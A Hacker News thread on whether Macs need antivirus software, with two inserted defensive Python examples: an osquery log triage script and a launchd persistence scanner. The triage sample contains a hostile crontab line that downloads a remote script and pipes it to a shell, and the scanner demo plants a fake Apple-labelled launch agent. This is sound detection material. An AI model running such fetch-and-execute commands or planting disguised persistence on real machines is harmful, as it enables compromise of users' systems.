
Ask HN: Is no anti-virus software still best practice for mac? - _justinfunk
Just checking in on the community. I haven't found anything that suggests I should change my best-practices of not running and not suggesting others run anti-virus packages on their MacOS machines.

Is this still best-practice in the wider community?
======
AnIdiotOnTheNet
It is my considered opinion that "no anti-virus" is still the best practice
for nearly everything. About the only place it makes any sense is in your
email filters or anywhere else the public can send random bullshit.

At best they incur an ever present performance hit while only catching the
lowest of low-hanging fruit. At worst they are constantly getting in your way
with false positives (which train you to ignore any potentially legitimate
alerts) and breaking everything. And the for-profit ones tend toward the
latter, because if you never notice it you won't believe it is actually doing
anything and might not continue your subscription.

You might be thinking "that's all well and good for us computer geeks who know
what's what, but what about everyone else?". Most people aren't as dumb as
your ego likes to imagine them to be. They may not know the details of how
their computers work but they know sketchy looking crap when they see it. And
if they are that dumb then nothing will help them anyway.

No matter how you slice it, the cost/benefit pretty much never favors AV.

~~~
azinman2
“Most people aren't as dumb as your ego likes to imagine them to be. They may
not know the details of how their computers work but they know sketchy looking
crap when they see it.”

That’s simply not true. Like, at all. If it were, then viruses and malware
wouldn’t be spreading like they are, especially phishing campaigns. I know
many very smart people who have been compromised.

I also take issue with the word “dumb” — “smart” people can be caught off
guard as well. Not everything looks sketchy, as good phishing does everything
right to make you think it’s all ok.

It’s a really difficult type of software to create, and perhaps there’s room
for new computer vision type anti-viruses to find look-a-like websites, but
normal humans need all the help they can get!

~~~
hluska
I agree with what you're saying, but it's worth noting that the kinds of
attacks you're talking about cannot be reliably stopped by anti-virus.

Instead, they're stopped by almost constant security training. And, I'd argue
that if your security training is good enough to get people to recognize
phishing, spearphishing and the ilk, it's good enough to get them to recognize
the kinds of low hanging fruit that reactive anti-virus software protects
against.

------
atom_enger
In a corporate setting: At Etsy we use OSQuery on all of our corp
machines(macOS) to help with malware/virus detection. We use community rules:
https://github.com/facebook/osquery/blob/master/packs/osx-attacks.conf

In addition to community rules we also curate a bunch of rules in house from
malware we've discovered across our fleet. We then aggregate this info into
ELK and alert on it.

At Home: OSQuery as well + tiny elk stack + Elastalert. Overkill for a typical
home setup but I like it.
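
The pipeline described above (community pack plus in-house rules, results shipped to ELK and alerted on) can be sketched in a few dozen lines. The block below is an added example, not code from the original comment, from Etsy or from the osquery project: it triages a constructed sample of an osqueryd differential results log, applies two illustrative rules (a launchd item whose program lives in a hidden, temporary or home directory; a cron job that downloads and pipes a script to a shell) against a small curated allowlist, and collapses the hits per host the way an alert rule would before paging. The query names (`pack_osx-attacks_launchd`, `pack_osx-attacks_crontab`), host names, paths and the allowlist are all assumptions made for the example, not entries from the real pack or a real fleet.

```python
import json
from collections import defaultdict

# Constructed sample resembling osqueryd's differential results log: one JSON
# object per line, "added" rows are new since the previous run of the query,
# "removed" rows have disappeared. Hosts, query names and paths are invented.
SAMPLE_RESULTS_LOG = r"""
{"name":"pack_osx-attacks_launchd","hostIdentifier":"mbp-01","unixTime":1546300800,"action":"added","columns":{"path":"/Library/LaunchDaemons/com.apple.softwareupdate.plist","program_arguments":"/usr/sbin/softwareupdate -d","run_at_load":"1"}}
{"name":"pack_osx-attacks_launchd","hostIdentifier":"mbp-01","unixTime":1546300860,"action":"added","columns":{"path":"/Users/alice/Library/LaunchAgents/com.update.helper.plist","program_arguments":"/Users/alice/Library/.cache/helper -s","run_at_load":"1"}}
{"name":"pack_osx-attacks_launchd","hostIdentifier":"mbp-02","unixTime":1546300900,"action":"removed","columns":{"path":"/Library/LaunchAgents/com.example.agent.plist","program_arguments":"/Applications/Example.app/Contents/MacOS/agent","run_at_load":"1"}}
{"name":"pack_osx-attacks_crontab","hostIdentifier":"mbp-02","unixTime":1546300960,"action":"added","columns":{"path":"/var/at/tabs/alice","command":"curl -s http://198.51.100.7/x.sh | sh"}}
{"name":"pack_osx-attacks_crontab","hostIdentifier":"mbp-02","unixTime":1546300961,"action":"added","columns":{"path":"/var/at/tabs/root","command":"/usr/sbin/periodic daily"}}
"""

# Assumed in-house allowlist: binaries already verified across the fleet.
KNOWN_GOOD_PROGRAMS = {"/usr/sbin/softwareupdate", "/usr/sbin/periodic"}
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")


def parse_results_log(text):
    """Yield one dict per valid JSON line; a torn last line is skipped, not fatal."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def first_program(args):
    return args.split()[0] if args else ""


def classify(row):
    """Return a reason string if the row deserves an alert, else None."""
    if row.get("action") != "added":  # persistence being removed is not what we page on
        return None
    name, cols = row.get("name", ""), row.get("columns", {})
    if name.endswith("_launchd"):
        prog = first_program(cols.get("program_arguments", ""))
        if prog in KNOWN_GOOD_PROGRAMS:
            return None
        if "/." in prog:
            return "launchd item runs a binary from a hidden directory"
        if prog.startswith(TEMP_DIRS):
            return "launchd item runs a binary from a temp or shared directory"
        if prog.startswith("/Users/"):
            return "launchd item runs a binary from a user's home"
        return None
    if name.endswith("_crontab"):
        cmd = cols.get("command", "")
        downloader = any(t in cmd for t in ("curl ", "wget "))
        piped_to_shell = any(t in cmd for t in ("| sh", "| bash", "|sh", "|bash"))
        if downloader and piped_to_shell:
            return "cron job downloads and executes a remote script"
        if first_program(cmd) not in KNOWN_GOOD_PROGRAMS and cmd.startswith(TEMP_DIRS):
            return "cron job runs from a temp or shared directory"
        return None
    return None


def triage(text):
    findings = []
    for row in parse_results_log(text):
        reason = classify(row)
        if reason:
            findings.append({"host": row.get("hostIdentifier", "?"), "query": row.get("name"),
                             "when": row.get("unixTime"), "reason": reason,
                             "evidence": row.get("columns", {})})
    return findings


def summarize_by_host(findings):
    """Collapse findings per host, the way an alert rule would before paging."""
    per_host = defaultdict(list)
    for f in findings:
        per_host[f["host"]].append(f["reason"])
    return dict(per_host)


if __name__ == "__main__":
    for host, reasons in summarize_by_host(triage(SAMPLE_RESULTS_LOG)).items():
        print(f"{host}: {len(reasons)} finding(s)")
        for r in reasons:
            print(f"  - {r}")
```

Two design points carry over to a real deployment: only `added` rows are scored, because differential logging also emits `removed` rows and alerting on those drowns the signal; and the allowlist is checked before any heuristic, since the same `curl | sh` pattern that flags a cryptominer dropper also appears in a few legitimate installers, and the in-house rules are where that fleet-specific knowledge lives.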

~~~
k_lander
Got any links to articles to walk through getting this set up?

~~~
fritzx6
https://blog.kolide.com/monitoring-macos-hosts-with-osquery-ba5dcc83122d

Hope that helps!

I would also recommend joining the osquery slack: https://osquery-slack.herokuapp.com/

~~~
atom_enger
nice thanks for the assist Zach!

------
rb808
My approach is to make my PC disposable. With all cloud services its a lot
easier than it used to be. IE

* Working code in github

* Photos in offline multiple HDD

* Docs in cloud servers and important ones printed out.

This way I dont really care if I get a virus, or gets stolen, or destroyed in
fire or HDD crash etc. I actually locked myself out of my encrypted laptop and
it didnt really matter - I just reinstalled everything.

I also think anti-virus is more trouble than its worth now, but am more
assured as above.

~~~
mbeattie
Why would you have bothered encrypting the laptop if everything is in the
cloud/elsewhere anyway?

~~~
asperous
You would still want to encrypt since sensitive data might be cached on the
hard drive in plain text or credentials stored in an insecure way.

------
binaryanomaly
Have one but never needed it so far - or it didn't catch the virii ;)

I use Bitdefender; at least it's quite unobtrusive on Mac (sick of the Windows
version!). Sophos is free and AFAIK not too bad if you need one:
https://home.sophos.com/free-mac-antivirus

Further I use:

- https://objective-see.com/products/knockknock.html

- https://objective-see.com/products/oversight.html

- https://objective-see.com/products/blockblock.html

and Little Snitch:
https://www.obdev.at/products/littlesnitch/index.html

and Firefox with:

- https://github.com/gorhill/uMatrix

- https://github.com/gorhill/ublock

Hope that keeps the pest away ;)

~~~
submeta
I use bitdefender as well, but lately I started deactivating "autopilot" (auto
scanning folders in the background) because it pushes my cpu usage to > 100%
regularly while I am using my Mac.

~~~
binaryanomaly
I fortunately do not have that problem, yet. But the autopilot stuff and other
weird stuff bitdefender is doing autonomously is exactly why i may ditch it
soon. Will probably switch to sophos once it happens.

------
hluska
Are these machines part of a cardholder data environment (as defined by PCI-
DSS)?

If the answer to that is 'yes', honestly, just suck it up and install it. It
will be cheaper, easier and far less annoying to install some AV in your CDE
than to have to explain why you didn't in the event of a breach.

(Note --- Post breach audits are my personal definition of hell.)

Otherwise, anti-virus is reactive and tends to protect against the lowest
hanging fruit, all while introducing a real cost to everything else you do on
that machine. Personally, I'd skip AV and just do a bit of security training.

------
acoye
Well, macOS (and Windows) have built-in ones. macOS has XProtect, among other
things like app signing.

Also note that for Spectre and Meltdown, 3rd-party antivirus had kernel patches
delayed as they can become sort of an issue.

------
tekstar
I don't run traditional antivirus but I do run:

https://objective-see.com/products/blockblock.html (free) Detects when
software attempts to install itself to run at startup and lets you block the
registration.

[https://www.obdev.at/products/littlesnitch/index.html](https://www.obdev.at/products/littlesnitch/index.html)
(paid) detects, reports, blocks applications connecting to the internet.

[https://adguard.com/en/welcome.html](https://adguard.com/en/welcome.html)
(paid) High quality adblocker for safari.
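
What BlockBlock reacts to is a new launchd registration. The block below is an added example, not code from the original comment and not Objective-See's own implementation: it is a poll-based approximation (BlockBlock itself watches in real time) that snapshots the property lists in launchd's persistence directories, records a SHA-256 and the fields a reviewer cares about (label, program, RunAtLoad, KeepAlive), and reports new, modified and removed registrations relative to a saved baseline. The directory list is the usual launchd location set, but the demo builds its own temporary directory and constructed plists so it runs on any OS; the labels and paths in it are invented.

```python
import hashlib
import os
import plistlib
import tempfile

# Where launchd looks for persistent items on a real Mac (assumed here; the demo
# below uses a temporary directory instead so it runs anywhere).
LAUNCHD_DIRS = ["/Library/LaunchAgents", "/Library/LaunchDaemons",
                os.path.expanduser("~/Library/LaunchAgents")]


def sha256_of(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def describe_launch_item(path):
    """Pull the fields a reviewer cares about out of a launchd property list."""
    with open(path, "rb") as f:
        data = plistlib.load(f)
    args = data.get("ProgramArguments") or []
    program = data.get("Program") or (args[0] if args else "")
    return {"label": data.get("Label", "?"), "program": program,
            "run_at_load": bool(data.get("RunAtLoad", False)),
            "keep_alive": bool(data.get("KeepAlive", False))}


def scan(dirs):
    """Snapshot every .plist in the given directories, keyed by path."""
    items = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(d, name)
            entry = {"sha256": sha256_of(path)}
            try:
                entry.update(describe_launch_item(path))
            except Exception as exc:  # a plist launchd cannot parse is still worth a look
                entry.update({"label": "?", "program": "", "run_at_load": False,
                              "keep_alive": False, "error": repr(exc)})
            items[path] = entry
    return items


def diff_registrations(baseline, current):
    """New, modified and removed launchd registrations since the baseline."""
    changes = []
    for path, item in current.items():
        old = baseline.get(path)
        if old is None:
            changes.append(("new", path, item))
        elif old["sha256"] != item["sha256"]:
            changes.append(("modified", path, item))
    for path, item in baseline.items():
        if path not in current:
            changes.append(("removed", path, item))
    return changes


def demo():
    """Constructed scenario: one legitimate agent in the baseline, then a new
    registration with an Apple-looking label pointing into a hidden directory."""
    agents = os.path.join(tempfile.mkdtemp(), "LaunchAgents")
    os.makedirs(agents)
    with open(os.path.join(agents, "com.example.updater.plist"), "wb") as f:
        plistlib.dump({"Label": "com.example.updater",
                       "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater"],
                       "RunAtLoad": True}, f)
    baseline = scan([agents])
    with open(os.path.join(agents, "com.apple.softwareupdate.helper.plist"), "wb") as f:
        plistlib.dump({"Label": "com.apple.softwareupdate.helper",
                       "ProgramArguments": ["/Users/alice/Library/.hidden/helper", "--daemon"],
                       "RunAtLoad": True, "KeepAlive": True}, f)
    return diff_registrations(baseline, scan([agents]))


if __name__ == "__main__":
    for kind, path, item in demo():
        print(f"{kind}: {path} -> {item['program']} (RunAtLoad={item['run_at_load']})")
```

Run against `LAUNCHD_DIRS` on a Mac, save the `scan()` result as JSON, and re-run from cron or a launch agent of your own; anything reported as `new` or `modified` is the prompt BlockBlock would have shown you, with the program path as the thing to actually look at (a plausible Apple-style label is no evidence of anything).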

~~~
jbob2000
I am super skeptical about ad guard and I'm looking for someone to allay that
skepticism. It's just... too clean. I don't trust software _this_ perfect,
especially since it's made in Russia and sees all the internet traffic on my
computer.

~~~
tekstar
I didn't know it was made in Russia! Up until now I've had a good experience,
and trusted reviews.

But as an experiment I just tried removing the little snitch filter that lets
adguard create all outgoing connections. it looks like adguard will request
some or all requests that my web browser makes (like, it'll also request JS
from slack or facebook). This might be because it detects and blocks crypto
miner JS, or maybe some other heuristics. So far it hasn't tried to phone home
but it's hard to look for that with little snitch when it's trying to connect
to every site I browse to.

~~~
jbob2000
Yeah, I ran their free trial and had a good experience. I did the same kind of
tests you did, but I still don't feel comfortable with it. It's just too
slick. That mixed with the fact that their entire team is Russian nationals...
I dunno. Too sketchy.

------
mc32
Even if people aren’t targeting Macs, if you comms with people using other
OSes, it’s good citizenship to ensure your machine is not a host vector.

------
johnklos
Macs are excellent about making it difficult to run and install things,
accidentally or otherwise. If someone can't listen to simple instructions
about not "updating Flash" or not installing a "PDF plugin", anti-virus isn't
going to stop them. In cases like that, it's better to focus on the problem,
not the symptom.

To pick some nits, viruses are self-replicating. There are no viruses on Macs
(yet). There are tons of Trojans. It's a big and important difference, but we
obviously can't count on sensationalistic media to care about the difference.
The more technical people here on HN, though, should know and care.

------
lorenzhs
One of the best anti-virus tools on any platform is a good adblocker (I prefer
ublock origin). It completely removes large classes of infection sources
(malvertising, fake download buttons, etc). Then disable macros in office
products. If every IT department did that, they’d have much more time for
useful work.

Whether you use antivirus or not, use an adblocker. Keeping broken
monetisation strategies alive is not your job, keeping your data safe is.

~~~
AnIdiotOnTheNet
I really wish we could disable macros, but it turns out the hoops we'd have to
jump through just so accounting could continue to do their jobs wasn't worth
the effort.

I'm sure some academic out there will berate me for not insisting that we
disassemble an entire department's workflow and rewrite it in SQL with some
web frontend, but I work in the real world where costs need to be justified
and the truth is they couldn't be. There were much simpler and cheaper ways to
mitigate the threats we were worried about.

Ad blocking interferes with the Marketing Department occasionally but covers
such a huge range of problems that it really is worth it.

------
protomyth
Normally, I would say no, but recently, I've been thinking a bit differently
on the matter. At minimum a good ad blocker is needed, and even with that some
things are getting through. If the general technical experience level of the
user is low to medium, I would seriously consider a virus protector.

On the same note, Deep Freeze for those of you who have to deal with a bunch
of Windows machines in a lab or library situation is amazing.

------
BjoernKW
I don’t think it’s particularly widely used but in my opinion using antivirus
software is a matter of good hygiene, even if the system you run isn’t prone
to being infected by viruses.

For example, I occasionally receive Office documents or ZIP archives from
clients.

If those should contain viruses these likely won’t affect my Mac but I can
inform my client about this, help him fix his security issues and prevent
viruses from spreading even further.

------
uniacid
You have a few different options based on the comments here like locking down
incoming/outgoing traffic with little snitch or other tools out there.

I would definitely recommend Avast though if you are concerned about safety,
I've used it for some time now off and on and it does a good job of filtering
pretty much any file based viruses as well as internet and email based
exploits.

- https://www.avast.com/en-us/free-mac-security

------
wand3r
I use the objective-see suite of products like little snitch (well, their new
open source version named something different), knock-knock, block-block and
kext-viewer. They are all free and let you know what is going on without trying
to manage everything. They also have a simple menu item that lets you know if
your camera is hijacked. I like their software.

------
vbezhenar
I never used any third-party antivirus software. AFAIK both Windows and macOS
have built-in antivirus software, although I think that it's not required
either. Properly patched software to minimize risk of RCE vulnerability and
brain to avoid running untrusted programs should be enough.

~~~
alpb
macOS does not have built-in antivirus software, hence the question.

~~~
vbezhenar
I believe it's called XProtect. It checks files with known virus signatures.

------
arzel
Nowadays I just figure it's common sense on what to install/what not to
install.

I personally haven't ever used an Antivirus on my Mac. If you believe you
'need' one, I recommend MalwareBytes.

------
45h34jh53k4j
you need AV on your corporate macs. No excuses.

For those in "my enterprise doesnt need AV, because AV is stupid" camp: In the
last week, the enterprise AV:

* Blocked 15 cryptominers

* Blocked 3 email based ransomware attachments

* Blocked 6 phishing emails

* Blocked 3 installs for MacKeeper (PUA)

* Found 4 other adware-type infections on hosts

Without it, these things would have hit the organisation. AV -- it will catch
the lowest hanging fruit. You need this. It is necessary, but not sufficient.

~~~
ken
This [1] post last year pointed to Google Project Zero, which found dozens of
exploits in popular AV software. What if your third-party AV _is_ your lowest
hanging fruit? How many issues did your AV itself cause? How would you know?

[1]: https://robert.ocallahan.org/2017/01/disable-your-antivirus-software-except.html

~~~
45h34jh53k4j
I'm aware of the research P0 did on AV -- it's very important, and their
findings were fed back to the vendors, to improve their products. AV is not
the low hanging fruit; there has never been a discovered malware that exploits
an AV bug. It might happen, but you are a million times more likely to find a
garden variety malware that all AV detects.

(Of course I am ignoring APT/nation state 0day, as it is not specifically
about AV; all software is vulnerable against an adversary of this skill.) If
your worry is APT attacking your AV, you'd best be looking at your operating
system first.

------
jccalhoun
I just got in trouble at work today for booting my computer from an external
drive to bypass the antivirus laden computer I have to use normally.

------
gaius
I use BitDefender, which also has various web privacy features and a VPN.

However it interacts annoyingly with RStudio despite being told repeatedly to
trust it.

~~~
binaryanomaly
BitDefender is quite a pain if it ever gets in your way. They really did a bad
job there; I wouldn't buy it again.

------
frankzander
In my opinion it's also the best practice for Windows. But never without an ad
blocker like uBlock.

------
choward
As far as I'm concerned, anything not open source is a virus.

------
rightos
Little Snitch is all you need.

------
NameNickHN
No anti virus software is even best-practice for Windows. At least third party
anti virus software.

------
jraph
At INRIA (a French computer science research institute), AV became mandatory
on Macs last year.

A colleague of mine got hit recently by a crypto-miner on their Mac. I don't
know if they had an AV, and if so, if the AV would have caught the miner. This
was detected by the IT department by monitoring suspicious traffic.

I don't use macOS so I can't really say. I see AVs as another piece of
proprietary software that you have to trust, and that takes significant
resources without knowing how useful they are.

On Windows, I would probably use the one from Microsoft, since it's free and
since I would already "trust" Microsoft by using their OS and I would somewhat
bet that it is in their interest to keep their OS safe. I can't be sure though:
why is it not integrated by default (or is it?)? To allow competition? Then is
Microsoft making their antivirus less efficient so the competition is still
relevant? And maybe AV is not really Microsoft's main business so their
antivirus may be lacking?

On the other side, I would bet it is in the interest of other AVs to always
nag you and make you feel they are present and useful more than being actually
efficient for other things than high detection rates in benchmarks.

They are irritating and advertise themselves in people's mail signatures,
sometimes outright lying: "this email has no viruses" - that you can't be
sure of, and the mail could have got a virus on its way between the sender and
the recipient.

By design, AVs can't really detect new viruses and I would not feel really
more confident with an AV than without because of that. AVs didn't catch
ransomware when it first appeared after all.

I don't use any antivirus. My approach to security is:

- Using only free software, as much as possible (I know, I would need to
audit everything I use for this to be perfect, but I can't possibly do that).

- that is preferably installed from the OS vendor, which I have no choice but
to trust anyway.

- usage of an ad blocker with more filters than the default

- be careful when clicking links

- instant backups in a self hosted cloud for important things, and automatic
daily snapshots of this cloud somewhere else

- and I also happen to never be browsing sketchy websites.

- all this is true on my phone as well.

One could add usage of Google safe browsing or something related for phishing.
And also blocking Javascript or third party Javascript by default when
browsing, which I did at some point in my life but which is not convenient for
most people.

Would I recommend AV for somebody who uses an OS that is more targeted by
viruses than mine, and is likely to fall into a trap (the kind of trap an AV
would catch anyway)? Probably Windows Defender on Windows, for Macs I really
don't know. If there is an AV provided by Apple or by some other company you
trust, I guess I would go for it rather than having nothing.

You can always get viruses from the network that will silently exploit an
unfixed security breach on any system, and that may remain undetected so at
least, I would tell them to be careful, to keep their system updated and to
make backups regularly (ideally, backups should be automatic to some extent),
since AVs can't guarantee that no virus will make it.

I would make sure that they are not too confident in the AV, too.

------
czbond
If you are an employee or contractor - your risk is higher than you might
think. As an employee, if you do 'non-work' activity on your laptop that
compromises its integrity - you could be at actual monetary/legal risk. I
would highly recommend you have one. Also, as a contractor you run a higher
risk. With Mac, configure your built in firewall. Run a "paid for" version of
Bitdefender or other. Use VPN ad blocking. Use LTE connections, not wi-fi, for
VPN connections.

~~~
drdaeman
> Use LTE connections, not wi-fi, for VPN connections

I'd get it for non-VPN, but for VPN connections - how does it matter? As long
as peers properly authenticate each other, of course.

> If you are an employee or contractor - your risk is higher

Higher than whose risk?

~~~
elif
No idea if this is what the commenter was implying, but I think the advice is
because plenty of apps can send requests in the 1 second initial window as you
authenticate your VPN.

In theory, that could be sensitive data or enable a sophisticated attacker to
correlate you with your VPN exit (if you were using it for pseudo-anonymity).

I don't think key negotiation is compromised in any way...

